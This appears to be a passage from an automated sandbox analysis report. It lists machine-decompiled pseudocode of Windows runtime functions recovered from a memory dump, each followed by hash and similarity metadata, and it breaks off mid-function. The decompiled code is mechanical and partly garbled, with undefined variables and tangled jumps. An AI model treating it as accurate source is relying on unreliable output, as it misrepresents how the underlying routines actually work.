                                          				_t29 = 0;
                                          				_v8 = __ecx;
                                          				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
                                          				_t38 = L00F34620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
                                          				if(_t38 != 0) {
                                          					_t40 = _a4;
                                          					 *_t40 = 1;
                                          					E00F5F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
                                          					_t22 = _v12 >> 1;
                                          					_t32 = 0x2e;
                                          					 *((short*)(_t38 + _t22 * 2)) = _t32;
                                          					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
                                          					_t23 = E00F4D268(_t38, 1);
                                          					asm("sbb al, al");
                                          					 *_t40 =  ~_t23 + 1;
                                          					L00F377F0(_v16, 0, _t38);
                                          				} else {
                                          					 *_a4 = 0;
                                          					_t29 = 0xc0000017;
                                          				}
                                          				return _t29;
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction ID: 8cdc7923db5456430ae0476bdcc8ceb830616ef4fa66eb58cbee37797de44ec5
                                          • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                          • Instruction Fuzzy Hash: F8112572904208BBCB019F5CD881CBEFBB9EF95310F1080AAF944C7351DA359D55E3A4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 22%
                                          			E00F42397(intOrPtr _a4) {
                                          				void* __ebx;
                                          				void* __ecx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				signed int _t11;
                                          				void* _t19;
                                          				void* _t25;
                                          				void* _t26;
                                          				intOrPtr _t27;
                                          				void* _t28;
                                          				void* _t29;
                                          
                                          				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
                                          				if( *0x100848c != 0) {
                                          					L00F3FAD0(0x1008610);
                                          					if( *0x100848c == 0) {
                                          						E00F3FA00(0x1008610, _t19, _t27, 0x1008610);
                                          						goto L1;
                                          					} else {
                                          						_push(0);
                                          						_push(_a4);
                                          						_t26 = 4;
                                          						_t29 = E00F42581(0x1008610, 0xef50a0, _t26, _t27, _t28);
                                          						E00F3FA00(0x1008610, 0xef50a0, _t27, 0x1008610);
                                          					}
                                          				} else {
                                          					L1:
                                          					_t11 =  *0x1008614; // 0x0
                                          					if(_t11 == 0) {
                                          						_t11 = E00F54886(0xef1088, 1, 0x1008614);
                                          					}
                                          					_push(0);
                                          					_push(_a4);
                                          					_t25 = 4;
                                          					_t29 = E00F42581(0x1008610, (_t11 << 4) + 0xef5070, _t25, _t27, _t28);
                                          				}
                                          				if(_t29 != 0) {
                                          					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
                                          					 *((char*)(_t29 + 0x40)) = 0;
                                          				}
                                          				return _t29;
                                          			}
















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 1c85108835d97aa5a349de33d84fc9c9690c6744245d20e6aea268ee3d7cba69
                                          • Instruction ID: 756543e73a20e0f33f849a41d17033bf239e7d979e9e1afdae42430a6f211b21
                                          • Opcode Fuzzy Hash: 1c85108835d97aa5a349de33d84fc9c9690c6744245d20e6aea268ee3d7cba69
                                          • Instruction Fuzzy Hash: A9112F32E0070157D771AA299C85B25BA98FB90730F59843AFF45A7191CDBCDC44B754
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 42%
                                          			E00F1C962(char __ecx) {
                                          				signed int _v8;
                                          				intOrPtr _v12;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				intOrPtr _t19;
                                          				char _t22;
                                          				intOrPtr _t26;
                                          				intOrPtr _t27;
                                          				char _t32;
                                          				char _t34;
                                          				intOrPtr _t35;
                                          				intOrPtr _t37;
                                          				intOrPtr* _t38;
                                          				signed int _t39;
                                          
                                          				_t41 = (_t39 & 0xfffffff8) - 0xc;
                                          				_v8 =  *0x100d360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
                                          				_t34 = __ecx;
                                          				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
                                          					_t26 = 0;
                                          					E00F2EEF0(0x10070a0);
                                          					_t29 =  *((intOrPtr*)(_t34 + 0x18));
                                          					if(E00F9F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
                                          						L9:
                                          						E00F2EB70(_t29, 0x10070a0);
                                          						_t19 = _t26;
                                          						L2:
                                          						_pop(_t35);
                                          						_pop(_t37);
                                          						_pop(_t27);
                                          						return E00F5B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
                                          					}
                                          					_t29 = _t34;
                                          					_t26 = E00F9F1FC(_t34, _t32);
                                          					if(_t26 < 0) {
                                          						goto L9;
                                          					}
                                          					_t38 =  *0x10070c0; // 0x0
                                          					while(_t38 != 0x10070c0) {
                                          						_t22 =  *((intOrPtr*)(_t38 + 0x18));
                                          						_t38 =  *_t38;
                                          						_v12 = _t22;
                                          						if(_t22 != 0) {
                                          							_t29 = _t22;
                                          							 *0x100b1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
                                          							_v12();
                                          						}
                                          					}
                                          					goto L9;
                                          				}
                                          				_t19 = 0;
                                          				goto L2;
                                          			}



















                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 6e4373fe033d7e9d691d61f397fab06fadd5f22b9e20c33a8c5a39b128ed405c
                                          • Instruction ID: 4332953110787696a0beb78560e1ec99218bcd6798757e2bc8f841dd7ed06110
                                          • Opcode Fuzzy Hash: 6e4373fe033d7e9d691d61f397fab06fadd5f22b9e20c33a8c5a39b128ed405c
                                          • Instruction Fuzzy Hash: AD1102327047029BC711BF29DC85AAA77A1FB85320F200228F88183691DB28EC14E7D1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 87%
                                          			E00F537F5(void* __ecx, intOrPtr* __edx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t6;
                                          				intOrPtr _t13;
                                          				intOrPtr* _t20;
                                          				intOrPtr* _t27;
                                          				void* _t28;
                                          				intOrPtr* _t29;
                                          
                                          				_t27 = __edx;
                                          				_t28 = __ecx;
                                          				if(__edx == 0) {
                                          					E00F32280(_t6, 0x1008550);
                                          				}
                                          				_t29 = E00F5387E(_t28);
                                          				if(_t29 == 0) {
                                          					L6:
                                          					if(_t27 == 0) {
                                          						E00F2FFB0(0x1008550, _t27, 0x1008550);
                                          					}
                                          					if(_t29 == 0) {
                                          						return 0xc0000225;
                                          					} else {
                                          						if(_t27 != 0) {
                                          							goto L14;
                                          						}
                                          						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
                                          						goto L11;
                                          					}
                                          				} else {
                                          					_t13 =  *_t29;
                                          					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
                                          						L13:
                                          						_push(3);
                                          						asm("int 0x29");
                                          						L14:
                                          						 *_t27 = _t29;
                                          						L11:
                                          						return 0;
                                          					}
                                          					_t20 =  *((intOrPtr*)(_t29 + 4));
                                          					if( *_t20 != _t29) {
                                          						goto L13;
                                          					}
                                          					 *_t20 = _t13;
                                          					 *((intOrPtr*)(_t13 + 4)) = _t20;
                                          					asm("btr eax, ecx");
                                          					goto L6;
                                          				}
                                          			}












                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fb2bdf6f97c07ea780a0e227f3f8bffef6e8f7a19cfd0d2faf4f9765f2190911
                                          • Instruction ID: f2c989cdc5b963cbc9a6814f6ae4b1bcac7d3368026d0ad0e5faf38db2cb128a
                                          • Opcode Fuzzy Hash: fb2bdf6f97c07ea780a0e227f3f8bffef6e8f7a19cfd0d2faf4f9765f2190911
                                          • Instruction Fuzzy Hash: 6D0126B3D41A209BC33B8B5DD900E26BBA6EF95BB3B154069FE458B201C734DE04E780
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 100%
                                          			E00F4002D() {
                                          				void* _t11;
                                          				char* _t14;
                                          				signed char* _t16;
                                          				char* _t27;
                                          				signed char* _t29;
                                          
                                          				_t11 = E00F37D50();
                                          				_t27 = 0x7ffe0384;
                                          				if(_t11 != 0) {
                                          					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          				} else {
                                          					_t14 = 0x7ffe0384;
                                          				}
                                          				_t29 = 0x7ffe0385;
                                          				if( *_t14 != 0) {
                                          					if(E00F37D50() == 0) {
                                          						_t16 = 0x7ffe0385;
                                          					} else {
                                          						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          					}
                                          					if(( *_t16 & 0x00000040) != 0) {
                                          						goto L18;
                                          					} else {
                                          						goto L3;
                                          					}
                                          				} else {
                                          					L3:
                                          					if(E00F37D50() != 0) {
                                          						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                          					}
                                          					if( *_t27 != 0) {
                                          						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
                                          							goto L5;
                                          						}
                                          						if(E00F37D50() != 0) {
                                          							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                                          						}
                                          						if(( *_t29 & 0x00000020) == 0) {
                                          							goto L5;
                                          						}
                                          						L18:
                                          						return 1;
                                          					} else {
                                          						L5:
                                          						return 0;
                                          					}
                                          				}
                                          			}









                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction ID: 25712348bc5e1be6db0952246288703963de1b85ededabb9e9cd8a1d3bc5373e
                                          • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                          • Instruction Fuzzy Hash: 9911A172A066828FD722A728D945B757BD4AF81774F1900A0EE1487692DB38EC41F364
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 94%
                                          			E00F2766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
                                          				char _v8;
                                          				void* _t22;
                                          				void* _t24;
                                          				intOrPtr _t29;
                                          				intOrPtr* _t30;
                                          				void* _t42;
                                          				intOrPtr _t47;
                                          
                                          				_push(__ecx);
                                          				_t36 =  &_v8;
                                          				if(E00F4F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
                                          					L10:
                                          					_t22 = 0;
                                          				} else {
                                          					_t24 = _v8 + __ecx;
                                          					_t42 = _t24;
                                          					if(_t24 < __ecx) {
                                          						goto L10;
                                          					} else {
                                          						if(E00F4F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
                                          							goto L10;
                                          						} else {
                                          							_t29 = _v8 + _t42;
                                          							if(_t29 < _t42) {
                                          								goto L10;
                                          							} else {
                                          								_t47 = _t29;
                                          								_t30 = _a16;
                                          								if(_t30 != 0) {
                                          									 *_t30 = _t47;
                                          								}
                                          								if(_t47 == 0) {
                                          									goto L10;
                                          								} else {
                                          									_t22 = L00F34620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t22;
                                          			}











                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction ID: a00c311fc44f0b444c40c32d15251f5b5796cf5b8fd7a1024740d8a484ac4f0b
                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                          • Instruction Fuzzy Hash: 86018832704629ABC720AEDEDC51E5B7BADEB84760F240574B908DB250DA30DD01A7A0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 69%
                                          			E00F19080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
                                          				intOrPtr* _t51;
                                          				intOrPtr _t59;
                                          				signed int _t64;
                                          				signed int _t67;
                                          				signed int* _t71;
                                          				signed int _t74;
                                          				signed int _t77;
                                          				signed int _t82;
                                          				intOrPtr* _t84;
                                          				void* _t85;
                                          				intOrPtr* _t87;
                                          				void* _t94;
                                          				signed int _t95;
                                          				intOrPtr* _t97;
                                          				signed int _t99;
                                          				signed int _t102;
                                          				void* _t104;
                                          
                                          				_push(__ebx);
                                          				_push(__esi);
                                          				_push(__edi);
                                          				_t97 = __ecx;
                                          				_t102 =  *(__ecx + 0x14);
                                          				if((_t102 & 0x02ffffff) == 0x2000000) {
                                          					_t102 = _t102 | 0x000007d0;
                                          				}
                                          				_t48 =  *[fs:0x30];
                                          				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
                                          					_t102 = _t102 & 0xff000000;
                                          				}
                                          				_t80 = 0x10085ec;
                                          				E00F32280(_t48, 0x10085ec);
                                          				_t51 =  *_t97 + 8;
                                          				if( *_t51 != 0) {
                                          					L6:
                                          					return E00F2FFB0(_t80, _t97, _t80);
                                          				} else {
                                          					 *(_t97 + 0x14) = _t102;
                                          					_t84 =  *0x100538c; // 0x77ad6828
                                          					if( *_t84 != 0x1005388) {
                                          						_t85 = 3;
                                          						asm("int 0x29");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						asm("int3");
                                          						_push(0x2c);
                                          						_push(0xfef6e8);
                                          						E00F6D0E8(0x10085ec, _t97, _t102);
                                          						 *((char*)(_t104 - 0x1d)) = 0;
                                          						_t99 =  *(_t104 + 8);
                                          						__eflags = _t99;
                                          						if(_t99 == 0) {
                                          							L13:
                                          							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                          							if(__eflags == 0) {
                                          								E00FE88F5(_t80, _t85, 0x1005388, _t99, _t102, __eflags);
                                          							}
                                          						} else {
                                          							__eflags = _t99 -  *0x10086c0; // 0xaa07b0
                                          							if(__eflags == 0) {
                                          								goto L13;
                                          							} else {
                                          								__eflags = _t99 -  *0x10086b8; // 0x0
                                          								if(__eflags == 0) {
                                          									goto L13;
                                          								} else {
                                          									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
                                          									__eflags =  *((char*)(_t59 + 0x28));
                                          									if( *((char*)(_t59 + 0x28)) == 0) {
                                          										E00F32280(_t99 + 0xe0, _t99 + 0xe0);
                                          										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
                                          										__eflags =  *((char*)(_t99 + 0xe5));
                                          										if(__eflags != 0) {
                                          											E00FE88F5(0x10085ec, _t85, 0x1005388, _t99, _t102, __eflags);
                                          										} else {
                                          											__eflags =  *((char*)(_t99 + 0xe4));
                                          											if( *((char*)(_t99 + 0xe4)) == 0) {
                                          												 *((char*)(_t99 + 0xe4)) = 1;
                                          												_push(_t99);
                                          												_push( *((intOrPtr*)(_t99 + 0x24)));
                                          												E00F5AFD0();
                                          											}
                                          											while(1) {
                                          												_t71 = _t99 + 8;
                                          												 *(_t104 - 0x2c) = _t71;
                                          												_t80 =  *_t71;
                                          												_t95 = _t71[1];
                                          												 *(_t104 - 0x28) = _t80;
                                          												 *(_t104 - 0x24) = _t95;
                                          												while(1) {
                                          													L19:
                                          													__eflags = _t95;
                                          													if(_t95 == 0) {
                                          														break;
                                          													}
                                          													_t102 = _t80;
                                          													 *(_t104 - 0x30) = _t95;
                                          													 *(_t104 - 0x24) = _t95 - 1;
                                          													asm("lock cmpxchg8b [edi]");
                                          													_t80 = _t102;
                                          													 *(_t104 - 0x28) = _t80;
                                          													 *(_t104 - 0x24) = _t95;
                                          													__eflags = _t80 - _t102;
                                          													_t99 =  *(_t104 + 8);
                                          													if(_t80 != _t102) {
                                          														continue;
                                          													} else {
                                          														__eflags = _t95 -  *(_t104 - 0x30);
                                          														if(_t95 !=  *(_t104 - 0x30)) {
                                          															continue;
                                          														} else {
                                          															__eflags = _t95;
                                          															if(_t95 != 0) {
                                          																_t74 = 0;
                                          																 *(_t104 - 0x34) = 0;
                                          																_t102 = 0;
                                          																__eflags = 0;
                                          																while(1) {
                                          																	 *(_t104 - 0x3c) = _t102;
                                          																	__eflags = _t102 - 3;
                                          																	if(_t102 >= 3) {
                                          																		break;
                                          																	}
                                          																	__eflags = _t74;
                                          																	if(_t74 != 0) {
                                          																		L49:
                                          																		_t102 =  *_t74;
                                          																		__eflags = _t102;
                                          																		if(_t102 != 0) {
                                          																			_t102 =  *(_t102 + 4);
                                          																			__eflags = _t102;
                                          																			if(_t102 != 0) {
                                          																				 *0x100b1e0(_t74, _t99);
                                          																				 *_t102();
                                          																			}
                                          																		}
                                          																		do {
                                          																			_t71 = _t99 + 8;
                                          																			 *(_t104 - 0x2c) = _t71;
                                          																			_t80 =  *_t71;
                                          																			_t95 = _t71[1];
                                          																			 *(_t104 - 0x28) = _t80;
                                          																			 *(_t104 - 0x24) = _t95;
                                          																			goto L19;
                                          																		} while (_t74 == 0);
                                          																		goto L49;
                                          																	} else {
                                          																		_t82 = 0;
                                          																		__eflags = 0;
                                          																		while(1) {
                                          																			 *(_t104 - 0x38) = _t82;
                                          																			__eflags = _t82 -  *0x10084c0;
                                          																			if(_t82 >=  *0x10084c0) {
                                          																				break;
                                          																			}
                                          																			__eflags = _t74;
                                          																			if(_t74 == 0) {
                                          																				_t77 = E00FE9063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
                                          																				__eflags = _t77;
                                          																				if(_t77 == 0) {
                                          																					_t74 = 0;
                                          																					__eflags = 0;
                                          																				} else {
                                          																					_t74 = _t77 + 0xfffffff4;
                                          																				}
                                          																				 *(_t104 - 0x34) = _t74;
                                          																				_t82 = _t82 + 1;
                                          																				continue;
                                          																			}
                                          																			break;
                                          																		}
                                          																		_t102 = _t102 + 1;
                                          																		continue;
                                          																	}
                                          																	goto L20;
                                          																}
                                          																__eflags = _t74;
                                          															}
                                          														}
                                          													}
                                          													break;
                                          												}
                                          												L20:
                                          												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
                                          												 *((char*)(_t99 + 0xe5)) = 1;
                                          												 *((char*)(_t104 - 0x1d)) = 1;
                                          												goto L21;
                                          											}
                                          										}
                                          										L21:
                                          										 *(_t104 - 4) = 0xfffffffe;
                                          										E00F1922A(_t99);
                                          										_t64 = E00F37D50();
                                          										__eflags = _t64;
                                          										if(_t64 != 0) {
                                          											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                          										} else {
                                          											_t67 = 0x7ffe0386;
                                          										}
                                          										__eflags =  *_t67;
                                          										if( *_t67 != 0) {
                                          											_t67 = E00FE8B58(_t99);
                                          										}
                                          										__eflags =  *((char*)(_t104 - 0x1d));
                                          										if( *((char*)(_t104 - 0x1d)) != 0) {
                                          											__eflags = _t99 -  *0x10086c0; // 0xaa07b0
                                          											if(__eflags != 0) {
                                          												__eflags = _t99 -  *0x10086b8; // 0x0
                                          												if(__eflags == 0) {
                                          													_t94 = 0x10086bc;
                                          													_t87 = 0x10086b8;
                                          													goto L27;
                                          												} else {
                                          													__eflags = _t67 | 0xffffffff;
                                          													asm("lock xadd [edi], eax");
                                          													if(__eflags == 0) {
                                          														E00F19240(_t80, _t99, _t99, _t102, __eflags);
                                          													}
                                          												}
                                          											} else {
                                          												_t94 = 0x10086c4;
                                          												_t87 = 0x10086c0;
                                          												L27:
                                          												E00F49B82(_t80, _t87, _t94, _t99, _t102, __eflags);
                                          											}
                                          										}
                                          									} else {
                                          										goto L13;
                                          									}
                                          								}
                                          							}
                                          						}
                                          						return E00F6D130(_t80, _t99, _t102);
                                          					} else {
                                          						 *_t51 = 0x1005388;
                                          						 *((intOrPtr*)(_t51 + 4)) = _t84;
                                          						 *_t84 = _t51;
                                          						 *0x100538c = _t51;
                                          						goto L6;
                                          					}
                                          				}
                                          			}




















                                          0x00f19198
                                          0x00f1919a
                                          0x00000000
                                          0x00000000
                                          0x00f7371f
                                          0x00f73721
                                          0x00f73727
                                          0x00f7372f
                                          0x00f73733
                                          0x00f73735
                                          0x00f73738
                                          0x00f7373b
                                          0x00f7373d
                                          0x00f73740
                                          0x00000000
                                          0x00f73746
                                          0x00f73746
                                          0x00f73749
                                          0x00000000
                                          0x00f7374f
                                          0x00f7374f
                                          0x00f73751
                                          0x00f73757
                                          0x00f73759
                                          0x00f7375c
                                          0x00f7375c
                                          0x00f7375e
                                          0x00f7375e
                                          0x00f73761
                                          0x00f73764
                                          0x00000000
                                          0x00000000
                                          0x00f73766
                                          0x00f73768
                                          0x00f737a3
                                          0x00f737a3
                                          0x00f737a5
                                          0x00f737a7
                                          0x00f737ad
                                          0x00f737b0
                                          0x00f737b2
                                          0x00f737bc
                                          0x00f737c2
                                          0x00f737c2
                                          0x00f737b2
                                          0x00f19187
                                          0x00f19187
                                          0x00f1918a
                                          0x00f1918d
                                          0x00f1918f
                                          0x00f19192
                                          0x00f19195
                                          0x00000000
                                          0x00f19195
                                          0x00000000
                                          0x00f7376a
                                          0x00f7376a
                                          0x00f7376a
                                          0x00f7376c
                                          0x00f7376c
                                          0x00f7376f
                                          0x00f73775
                                          0x00000000
                                          0x00000000
                                          0x00f73777
                                          0x00f73779
                                          0x00f73782
                                          0x00f73787
                                          0x00f73789
                                          0x00f73790
                                          0x00f73790
                                          0x00f7378b
                                          0x00f7378b
                                          0x00f7378b
                                          0x00f73792
                                          0x00f73795
                                          0x00000000
                                          0x00f73795
                                          0x00000000
                                          0x00f73779
                                          0x00f73798
                                          0x00000000
                                          0x00f73798
                                          0x00000000
                                          0x00f73768
                                          0x00f7379b
                                          0x00f7379b
                                          0x00f73751
                                          0x00f73749
                                          0x00000000
                                          0x00f73740
                                          0x00f191a0
                                          0x00f191a3
                                          0x00f191a9
                                          0x00f191b0
                                          0x00000000
                                          0x00f191b0
                                          0x00f19187
                                          0x00f191b4
                                          0x00f191b4
                                          0x00f191bb
                                          0x00f191c0
                                          0x00f191c5
                                          0x00f191c7
                                          0x00f737da
                                          0x00f191cd
                                          0x00f191cd
                                          0x00f191cd
                                          0x00f191d2
                                          0x00f191d5
                                          0x00f19239
                                          0x00f19239
                                          0x00f191d7
                                          0x00f191db
                                          0x00f191e1
                                          0x00f191e7
                                          0x00f191fd
                                          0x00f19203
                                          0x00f1921e
                                          0x00f19223
                                          0x00000000
                                          0x00f19205
                                          0x00f19205
                                          0x00f19208
                                          0x00f1920c
                                          0x00f19214
                                          0x00f19214
                                          0x00f1920c
                                          0x00f191e9
                                          0x00f191e9
                                          0x00f191ee
                                          0x00f191f3
                                          0x00f191f3
                                          0x00f191f3
                                          0x00f191e7
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00f19134
                                          0x00f19125
                                          0x00f1911d
                                          0x00f1914e
                                          0x00f190d1
                                          0x00f190d1
                                          0x00f190d3
                                          0x00f190d6
                                          0x00f190d8
                                          0x00000000
                                          0x00f190d8
                                          0x00f190cf

                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4bb3ec0594afd2bb0113ddc6bb26acc0d295c6989a02415644f6a372d3750810
                                          • Instruction ID: b9c7a78f91940f80c9bb17f1953d622f8a68d24c4d54b0c126e9394a69d17064
                                          • Opcode Fuzzy Hash: 4bb3ec0594afd2bb0113ddc6bb26acc0d295c6989a02415644f6a372d3750810
                                          • Instruction Fuzzy Hash: 6201F4729053008FD3258F24DC50B2277B9FB49320F218026E1058B691C7B5DC81DFE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 46%
                                          			E00FAC450(intOrPtr* _a4) {
                                          				signed char _t25;
                                          				intOrPtr* _t26;
                                          				intOrPtr* _t27;
                                          
                                          				_t26 = _a4;
                                          				_t25 =  *(_t26 + 0x10);
                                          				if((_t25 & 0x00000003) != 1) {
                                          					_push(0);
                                          					_push(0);
                                          					_push(0);
                                          					_push( *((intOrPtr*)(_t26 + 8)));
                                          					_push(0);
                                          					_push( *_t26);
                                          					E00F59910();
                                          					_t25 =  *(_t26 + 0x10);
                                          				}
                                          				if((_t25 & 0x00000001) != 0) {
                                          					_push(4);
                                          					_t7 = _t26 + 4; // 0x4
                                          					_t27 = _t7;
                                          					_push(_t27);
                                          					_push(5);
                                          					_push(0xfffffffe);
                                          					E00F595B0();
                                          					if( *_t27 != 0) {
                                          						_push( *_t27);
                                          						E00F595D0();
                                          					}
                                          				}
                                          				_t8 = _t26 + 0x14; // 0x14
                                          				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
                                          					L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
                                          				}
                                          				_push( *_t26);
                                          				E00F595D0();
                                          				return L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
                                          			}







                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction ID: 9826925f481a8b9069462f747c92487282cb9445353b58063ede9acab7efe19c
                                          • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                          • Instruction Fuzzy Hash: BD01DEB2140609FFD726AF25CC81E62F7ADFF493A1F004125F60442561DB26ACA0EAE0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 86%
                                          			E00FE4015(signed int __eax, signed int __ecx) {
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed char _t10;
                                          				signed int _t28;
                                          
                                          				_push(__ecx);
                                          				_t28 = __ecx;
                                          				asm("lock xadd [edi+0x24], eax");
                                          				_t10 = (__eax | 0xffffffff) - 1;
                                          				if(_t10 == 0) {
                                          					_t1 = _t28 + 0x1c; // 0x1e
                                          					E00F32280(_t10, _t1);
                                          					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                          					E00F32280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x10086ac);
                                          					E00F1F900(0x10086d4, _t28);
                                          					E00F2FFB0(0x10086ac, _t28, 0x10086ac);
                                          					 *((intOrPtr*)(_t28 + 0x20)) = 0;
                                          					E00F2FFB0(0, _t28, _t1);
                                          					_t18 =  *((intOrPtr*)(_t28 + 0x94));
                                          					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
                                          						L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
                                          					}
                                          					_t10 = L00F377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                                          				}
                                          				return _t10;
                                          			}








                                          Memory Dump Source
                                          • Source File: 00000005.00000002.306740948.0000000000EF0000.00000040.00000001.sdmp, Offset: 00EF0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40cccb04615b4bc472a9f103ee55caecae7b3b1c001cbfbb84e11f0d0a99af33
                                          • Instruction ID: a87265432e67eeaad25a082e8e65fc0a185419e0e32c11ccaf6af586df083144
                                          • Opcode Fuzzy Hash: 40cccb04615b4bc472a9f103ee55caecae7b3b1c001cbfbb84e11f0d0a99af33
                                          • Instruction Fuzzy Hash: B80184716016857FD251BB69CD81E13B7ACFB49760F000239B60887A52CB28EC11D6E4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 61%
                                          			E00FD14FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                          				signed int _v8;
                                          				intOrPtr _v16;
                                          				intOrPtr _v20;
                                          				intOrPtr _v24;
                                          				intOrPtr _v28;
                                          				short _v54;
                                          				char _v60;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed char* _t21;
                                          				intOrPtr _t27;
                                          				intOrPtr _t33;
                                          				intOrPtr _t34;
                                          				signed int _t35;
                                          
                                          				_t32 = __edx;
